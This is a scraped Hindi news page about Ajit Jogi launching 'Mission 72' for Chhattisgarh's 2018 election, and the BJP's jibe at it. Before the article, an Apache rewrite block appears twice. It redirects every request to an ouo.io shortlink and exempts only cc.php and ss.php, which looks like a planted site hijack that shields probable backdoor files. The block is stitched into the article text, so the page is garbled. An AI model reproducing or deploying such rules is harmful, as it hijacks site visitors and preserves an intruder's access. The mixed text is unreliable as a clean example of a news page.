
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 369
Previous Nextरायपुर। छत्तीसगढ़ में चुनावी साल के तहत प्रदेश की तमाम राजनीतिक दलों द्वारा एक के बाद एक नया मिशन लॉन्च किया जा रहा है। इसी क्रम में छत्तीसगढ़ जनता कांग्रेस के सुप्रीमो अजीत जोगी द्वारा ऐसे ही एक मिशन 72 लॉन्च करने पर भारतीय जनता पार्टी और जोगी कांग्रेस आमने सामने आ गई है। एक अलग राजनीतिक पार्टी बनाकर लगातार सुर्खियों में रहने वाले अजीत जोगी ने चुनावी साल 2018 विधानसभा चुनाव के लिए कमर कस लिया है। इसी संदर्भ में उन्होंने मिशन 72 लॉन्च किया है, जिसकी औपचारिक शुरुआत आगामी 29 अप्रैल यानी अजीत जोगी के जन्मदिन पर होगी। जोगी कांग्रेस के प्रवक्ता संजीव अग्रवाल ने कहा कि किस पार्टी की क्या रणनीति है इससे उन्हें कोई फर्क नहीं पड़ता है। उन्होंने कहा कि अजीत जोगी के मिशन '72' का मतलब हिन्दी में 'सात-दो' यानी 'साथ दो' है। अजीत जोगी 29 अप्रैल को 72 साल के हो जाएंगे और इसी दिन पार्टी ने मिशन लॉन्च करने की तिथि निर्धारित की है। वहीं, दूसरी तरफ अजीत जोगी के मिशन '72' पर बीजेपी ने कटाक्ष किया है। छत्तीसगढ़ बीजेपी के प्रवक्ता केदार गुप्ता का कहना है कि जोगी जी तो लगातार एक-एक मिशन लॉन्च करते जा रहे हैं।